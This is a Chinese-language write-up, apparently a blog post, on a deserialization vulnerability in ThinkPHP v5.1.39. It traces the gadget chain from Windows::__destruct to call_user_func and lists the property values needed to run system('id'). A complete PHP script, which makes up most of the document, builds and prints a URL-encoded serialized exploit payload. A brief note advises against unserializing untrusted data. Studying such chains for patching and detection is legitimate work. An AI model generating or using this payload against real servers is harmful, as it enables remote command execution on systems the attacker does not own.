Thinkphp v5.1.39 LTS 反序列化漏洞分析 及 EXP(poc)
POP链为:
Windows::__destruct --> Pivot::__toString --> Request::__call --> Request::isAjax --> Request::param --> Request::input --> Request::filterValue --> call_user_func
EXP(POC):
倘若要执行 system('id'),则需要把反序列化出的对象的以下属性控制为如下值(前提是应用中存在对攻击者可控数据调用 unserialize() 的入口,payload 本身不会自行触发):
Request->filter = "system";
Request->param = array('id');
Request->hook['visible'] = [$this,"isAjax"];
Request->config['var_ajax'] = '';
Pivot->data = ["azhe" => new Request()];
Pivot->append = ["azhe" => ["4ut","15m"]];
Windows->files = [new Pivot()];
---exp---(运行下面的脚本会输出 URL 编码后的序列化 payload;防御上应避免对不可信数据调用 unserialize(),确有需要时用 allowed_classes 限制允许反序列化的类)
<?php
namespace think;
abstract class Model{
    /**
     * Stand-in for think\Model. Only the property visibility matters here:
     * $data is private and $append is protected so that the serialized
     * property names line up with the real framework class.
     */
    private $data = [];
    protected $append = [];

    public function __construct(){
        $request = new Request();
        // $data holds the object that __toString's toArray() path will call
        // visible() on; $append names the same key with an array so that
        // call is made (see the POP chain described above the listing).
        $this->data = ['azhe' => $request];
        $this->append = ['azhe' => ['4ut', '15m']];
    }
}
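class Request{
    /**
     * Mirror of think\Request's protected properties. Only a handful of
     * values drive the chain; the full $config array is kept so the
     * unserialized object still carries every key the real class reads.
     */
    protected $config = [
        // form request-method spoofing variable
        'var_method' => '_method',
        // form ajax spoofing variable
        'var_ajax' => '_ajax',
        // form pjax spoofing variable
        'var_pjax' => '_pjax',
        // PATHINFO variable name, used in compatibility mode
        'var_pathinfo' => 's',
        // compatible PATH_INFO lookup order
        'pathinfo_fetch' => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
        // default global filter method(s), comma separated
        'default_filter' => '',
        // domain root, e.g. thinkphp.cn
        'url_domain_root' => '',
        // HTTPS proxy marker
        'https_agent_name' => '',
        // IP proxy header marker
        'http_agent_ip' => 'HTTP_X_REAL_IP',
        // URL pseudo-static suffix
        'url_html_suffix' => 'html',
    ];
    protected $param = [];
    protected $hook = [];
    protected $filter;

    /**
     * @param string $cmd argument handed to the filter callable; defaults to
     *                    the post's `id`. Per the original author's note,
     *                    param() also merges submitted request parameters
     *                    into $param, so the command can alternatively be
     *                    supplied in the query string.
     */
    public function __construct(string $cmd = 'id'){
        // Chain ends in filterValue --> call_user_func($filter, $value):
        // $filter is the callable name, each $param element is its argument.
        $this->filter = 'system';
        // __call('visible', ...) resolves through $hook; pointing it at
        // isAjax() is what links Pivot::__toString to the param() path.
        $this->hook = ['visible' => [$this, 'isAjax']];
        // Every element here is passed through the filter callable.
        $this->param = [$cmd];
        // An empty var_ajax presumably makes isAjax() call param('') and
        // thereby filter the whole $param array -- confirm against 5.1.39.
        $this->config['var_ajax'] = '';
    }
}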
namespace think\process\pipes;
use think\Model\Pivot;
class Windows{
    /**
     * Stand-in for think\process\pipes\Windows, the chain's entry point:
     * its __destruct is what first touches $files. The property is private
     * so the serialized key matches the real class.
     */
    private $files ;

    public function __construct(){
        $pivot = new Pivot();
        $this->files = [$pivot];
    }
}
namespace think\model;
use think\Model;
/**
 * Stand-in for think\model\Pivot: an empty subclass so the object serializes
 * under that class name while carrying Model's $data / $append payload.
 */
class Pivot extends Model
{
}
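use think\process\pipes\Windows;

// Build the object graph and print the URL-encoded serialized payload.
// The closing `?>` is deliberately omitted: in a PHP-only file it only risks
// leaking trailing whitespace into the output.
echo urlencode(serialize(new Windows())) . "\n";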